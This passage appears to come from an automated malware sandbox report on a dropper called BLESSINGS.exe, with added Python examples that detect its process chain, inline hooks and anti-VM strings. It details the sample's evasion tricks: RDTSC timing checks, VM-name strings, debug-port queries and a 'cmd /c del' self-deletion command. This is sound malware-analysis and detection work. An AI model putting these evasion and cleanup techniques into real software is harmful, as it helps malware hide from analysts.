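SYSDIR_RE = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.I)
DEL_RE = re.compile(r"/c\s+del\s+(?:/\w+\s+)*['\"]?(?P<path>[^'\"]+?)['\"]?\s*$", re.I)
# .NET helper executables that belong under %WINDIR%\Microsoft.NET\Framework*;
# a copy running from %TEMP% is a dropped payload wearing a trusted file name.
FRAMEWORK_HELPERS = {"addinprocess32.exe", "addinprocess.exe"}


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dropped_helpers(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    """Processes whose image carries a .NET helper name but runs from the user's Temp directory."""
    return {e.pid: e for e in events
            if TEMP_RE.match(e.image) and _name(e.image) in FRAMEWORK_HELPERS}


def self_deletions(events: List[ProcEvent]) -> List[Tuple[Optional[ProcEvent], ProcEvent, ProcEvent]]:
    """(parent, deleted process, cmd.exe) for every 'cmd /c del' aimed at the image of a process in the tree."""
    by_pid = {e.pid: e for e in events}
    by_image = {e.image.lower(): e for e in events}
    hits = []
    for e in events:
        if _name(e.image) != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        target = by_image.get(m.group("path").lower()) if m else None
        if target is not None:
            hits.append((by_pid.get(e.ppid), target, e))
    return hits


def detect_chain(events: List[ProcEvent]) -> List[str]:
    """Human-readable findings; both rules firing on one tree is the pattern this report shows."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for pid, e in dropped_helpers(events).items():
        parent = by_pid.get(e.ppid)
        findings.append(f"dropped .NET helper {_name(e.image)} ran from Temp "
                        f"(pid {pid}, parent {_name(parent.image) if parent else 'unknown'})")
    for parent, target, cmd in self_deletions(events):
        who = _name(parent.image) if parent else "unknown"
        prefix = "system binary " if parent and SYSDIR_RE.match(parent.image) else ""
        findings.append(f"{prefix}{who} spawned cmd.exe (pid {cmd.pid}) to delete {target.image}, "
                        f"the image of pid {target.pid}")
    return findings


# Constructed process-creation events modelled on this report. PIDs are invented; the parent of
# raserver.exe is assumed to be explorer.exe, which the report itself lists as "unknown".
EVENTS = [
    ProcEvent(4012, 3300, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5100, 4012, r"C:\Users\user\Desktop\BLESSINGS.exe", r"'C:\Users\user\Desktop\BLESSINGS.exe'"),
    ProcEvent(6120, 5100, r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe",
              r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"),
    ProcEvent(6660, 4012, r"C:\Windows\SysWOW64\raserver.exe", r"C:\Windows\SysWOW64\raserver.exe"),
    ProcEvent(7012, 6660, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'"),
    ProcEvent(7020, 7012, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for line in detect_chain(EVENTS):
        print(line)
```

Run as a script to print the two findings. In production the events come from Sysmon event ID 1 or equivalent EDR process telemetry, and the image lookup must include processes that have already exited: by the time cmd.exe deletes the file, AddInProcess32.exe has handed off to raserver.exe and is gone.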
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: BLESSINGS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BLESSINGS.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: BLESSINGS.exe | Static file information: File size 3427840 > 1048576
          Source: BLESSINGS.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x344200
          Source: BLESSINGS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_05454B71 push es; iretd
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_05450A2A push ds; ret
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_054505E6 pushfd ; iretd
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_05454E9A push es; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0178D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_0457D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ED856 push esi; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECEB5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECF0B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECF02 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECF6C push eax; ret
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File opened: C:\Users\user\Desktop\BLESSINGS.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
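The finding above records that the first bytes of user32!PeekMessageA inside explorer.exe no longer match the module on disk. The Python below is an added example, not from this report or the sandbox vendor, of how a memory-forensics check arrives at such a line and what to do with it: the on-disk prologue is byte-compared with the live copy, and the patched bytes are matched against the usual trampoline encodings so that a recognised detour yields a target address to chase, while anything else (as with the six bytes reported here) is flagged for manual disassembly. The clean prologue and the load address are constructed assumptions; the six "new code" bytes are the ones quoted in the report.

```python
"""Triage an inline-hook finding: diff a function prologue on disk against the live copy."""
import struct
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass
class HookFinding:
    function: str
    changed: bool
    first_diff: Optional[int]     # offset of the first patched byte, None when clean
    new_code: str                 # hex of the patched bytes, as a sandbox reports them
    kind: str                     # trampoline classification
    target: Optional[int] = None  # decoded branch target, when the encoding gives one


MASK64 = (1 << 64) - 1


def classify_patch(code: bytes, va: int) -> Tuple[str, Optional[int]]:
    """Recognise the usual trampoline encodings at the start of a patched prologue."""
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        return "jmp rel32", (va + 5 + struct.unpack_from("<i", code, 1)[0]) & MASK64
    if len(code) >= 2 and code[0] == 0xEB:                       # jmp rel8
        return "jmp rel8", (va + 2 + struct.unpack_from("<b", code, 1)[0]) & MASK64
    if len(code) >= 6 and code[:2] == b"\xff\x25":               # jmp [disp32] / jmp [rip+disp32]
        return "jmp indirect", None
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:   # push imm32; ret (32-bit targets)
        return "push/ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    if code[:1] == b"\xcc":                                      # software breakpoint
        return "int3", None
    return "unrecognised", None


def compare_prolog(function: str, va: int, disk: bytes, memory: bytes) -> HookFinding:
    """Byte-compare on-disk and in-memory prologue bytes; classify the patch at the first mismatch."""
    n = min(len(disk), len(memory))
    diff = next((i for i in range(n) if disk[i] != memory[i]), None)
    if diff is None:
        return HookFinding(function, False, None, "", "clean")
    kind, target = classify_patch(memory[diff:], va + diff)
    return HookFinding(function, True, diff, memory[diff:diff + 6].hex(" "), kind, target)


# Constructed inputs (not bytes from any real user32.dll):
FUNC_VA = 0x00007FFA1C0A0000                        # hypothetical address of the export
CLEAN_PROLOG = b"\x4c\x8b\xdc\x53\x48\x83\xec\x40"   # mov r11,rsp ; push rbx ; sub rsp,40h
# The six "new code" bytes quoted in this report for user32!PeekMessageA, then the untouched tail:
REPORTED_MEMORY = b"\x48\x8b\xb8\x8f\xfe\xe2" + CLEAN_PROLOG[6:]
# A textbook 5-byte detour to FUNC_VA + 0x1000 (rel32 is relative to the end of the jmp):
JMP_MEMORY = b"\xe9" + struct.pack("<i", 0x1000 - 5) + CLEAN_PROLOG[5:]

if __name__ == "__main__":
    for mem in (CLEAN_PROLOG, REPORTED_MEMORY, JMP_MEMORY):
        print(compare_prolog("user32!PeekMessageA", FUNC_VA, CLEAN_PROLOG, mem))
```

On a live system the `disk` bytes come from mapping the DLL file and applying its relocations for the observed base, otherwise legitimate relocation fixups and hot-patch padding show up as false diffs; the comparison itself is what the sandbox's "user mode code has changed" signature reports.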
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Process information set: NOOPENFILEERRORBOX (38 identical entries)
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000001D98E4 second address: 00000000001D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000001D9B5E second address: 00000000001D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Window / User API: threadDelayed 401
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Window / User API: threadDelayed 9396
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100 | Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100 | Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972 | Thread sleep count: 401 > 30
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 972 | Thread sleep count: 9396 > 30
          Source: C:\Users\user\Desktop\BLESSINGS.exe TID: 5100 | Thread sleep count: 53 > 30
          Source: C:\Windows\explorer.exe TID: 5336 | Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6660 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed (2 entries)
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: VMware
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vmware svga
          Source: explorer.exe, 0000000A.00000000.458586378.0000000008540000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA,
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: cmd.txtQEMUqemu
          Source: explorer.exe, 0000000A.00000000.451742330.00000000063F6000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} (2 entries)
          Source: explorer.exe, 0000000A.00000002.701264945.0000000006302000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vmsrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: virtual-vmware pointing device
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.457496905.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vmusrvc
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vmtools
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp | Binary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.456554446.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.457745545.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 0000000A.00000000.450653153.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
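The strings above are what the sandbox pulled from BLESSINGS.exe and explorer.exe memory: the sample carries a vocabulary of hypervisor and guest-tool names (vmware, vbox, qemu, vmtools, vmsrvc, vmusrvc, tpautoconnsvc), and the injected explorer.exe holds the host's VMware device identifiers. The Python below is an added example, not part of this report or the sandbox, of the scanning side of that finding: it searches a raw dump for the same indicator vocabulary in both ASCII and UTF-16LE, because Windows stores device and service names as wide strings and an ASCII-only scan misses them. The dump is constructed from a few of the report's strings plus one UTF-16LE service name.

```python
"""Scan a raw memory dump for virtualization artefacts in ASCII and UTF-16LE."""
import re
from typing import Dict, List, Tuple

# Indicator substrings drawn from the strings this report found in BLESSINGS.exe / explorer.exe memory.
VM_INDICATORS = ["vmware", "vboxservice", "vbox", "qemu", "vmtools", "vmsrvc", "vmusrvc",
                 "tpautoconnsvc", "hyper-v", "virtual pc", "necvmwar"]


def _longest_first(words: List[str]) -> List[str]:
    # Longer alternatives first so "vboxservice" is not reported as a bare "vbox" hit.
    return sorted(words, key=len, reverse=True)


def _ascii_pattern(words: List[str]) -> "re.Pattern[bytes]":
    return re.compile(b"|".join(re.escape(w.encode("ascii")) for w in _longest_first(words)), re.I)


def _utf16le_pattern(words: List[str]) -> "re.Pattern[bytes]":
    parts = []
    for w in _longest_first(words):
        p = b""
        for ch in w:
            if ch.isalpha():
                # either case of the letter, followed by the zero high byte of UTF-16LE
                p += b"[" + ch.lower().encode("ascii") + ch.upper().encode("ascii") + b"]\x00"
            else:
                p += re.escape(ch.encode("ascii")) + b"\x00"
        parts.append(p)
    return re.compile(b"|".join(parts))


ASCII_RE = _ascii_pattern(VM_INDICATORS)
UTF16_RE = _utf16le_pattern(VM_INDICATORS)


def scan_blob(blob: bytes) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, text) for every indicator hit, ordered by offset."""
    hits = [(m.start(), "ascii", m.group().decode("ascii")) for m in ASCII_RE.finditer(blob)]
    hits += [(m.start(), "utf-16le", m.group().decode("utf-16-le")) for m in UTF16_RE.finditer(blob)]
    return sorted(hits)


def summarize(hits: List[Tuple[int, str, str]]) -> Dict[str, int]:
    """Count hits per indicator, case-folded, so 'QEMU' and 'qemu' land in one bucket."""
    counts: Dict[str, int] = {}
    for _, _, text in hits:
        counts[text.lower()] = counts.get(text.lower(), 0) + 1
    return counts


# Constructed dump: a few of the report's strings plus one UTF-16LE service name, padded with junk.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"SCSI\\Disk&Ven_VMware&Prod_Virtual_disk\\5&1ec51bf7&0&000000\x00"
    + b"\x90\x90\x90"
    + "vboxservice".encode("utf-16-le") + b"\x00\x00"
    + b"cmd.txtQEMUqemu\x00"
    + "tpautoconnsvc#Microsoft Hyper-V".encode("utf-16-le")
)

if __name__ == "__main__":
    for off, enc, text in scan_blob(SAMPLE_DUMP):
        print(f"0x{off:08x} {enc:9s} {text}")
    print(summarize(scan_blob(SAMPLE_DUMP)))
```

Hits in the dropper's own memory (the indicator list itself) and hits in explorer.exe (the host's real device names) mean different things: the first is evidence of anti-VM logic in the sample, the second merely describes the analysis box, which is why the report attributes each string to a specific process and memory region.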
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0173B171 mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0173C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0175B944 mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0176513A mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01754120 mov eax, dword ptr fs:[00000030h] (4x); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01739100 mov eax, dword ptr fs:[00000030h] (3x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h] (3x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h] (4x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017661A0 mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01762990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0176A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0175C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01750050 mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0176002D mov eax, dword ptr fs:[00000030h] (5x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0174B02A mov eax, dword ptr fs:[00000030h] (4x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017B7016 mov eax, dword ptr fs:[00000030h] (3x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01804015 mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h] (5x); mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0176F0BF mov ecx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h] (6x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01739080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01801074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017B3884 mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01763B7A mov eax, dword ptr fs:[00000030h] (2x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0173DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_01805BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0173F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0173DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h] (6x)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0175DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01741B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01741B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01774A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AA16 mov eax, dword ptr fs:[00000030h]
